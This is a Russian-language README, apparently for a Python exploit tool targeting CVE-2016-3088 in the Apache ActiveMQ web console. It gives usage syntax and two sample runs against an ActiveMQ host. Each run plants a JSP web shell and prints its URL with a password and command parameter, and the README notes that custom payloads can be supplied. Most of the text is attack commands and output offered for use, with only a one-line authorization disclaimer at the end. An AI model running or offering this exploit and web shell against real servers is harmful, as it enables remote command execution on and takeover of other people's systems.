
Python-скрипт эксплойта для CVE-2016-3088
Скрипт эксплойта на Python для CVE-2016-3088.
Это мой первый скрипт, поэтому что-то может быть не совсем подходящим.
Но, похоже, всё работает нормально, когда я тестировал.
Этот скрипт устраняет необходимость захвата пакетов при эксплуатации CVE-2016-3088,
поэтому мы можем напрямую записывать и перемещать файл.
python CVE-2016-3088.py --url http://ip:port/ [--path absolute_path] [--script filename.txt]
Параметр --script является опциональным; если запустить программу без него, будет использоваться встроенная полезная нагрузка,
эта нагрузка позволяет выполнять только несколько команд в URL.
Но вы можете указать другие скрипты для достижения своих целей.
Просто скачайте .py файл.
И он требует несколько модулей.
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/d404ca6ffa5849a9ab1202dd388684f5.jsp?pwd=023&i=[Your-Command]
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq --script script.txt
[+] The target is Vulnerable
[+] Exploiting...
[+] Successful!
[+] Visit The JSP file: http://192.168.244.153:8161/admin/6655d82d47cd43bb8a21515f476bce1f.jsp
Пожалуйста, используйте этот инструмент с осторожностью и только при наличии авторизации!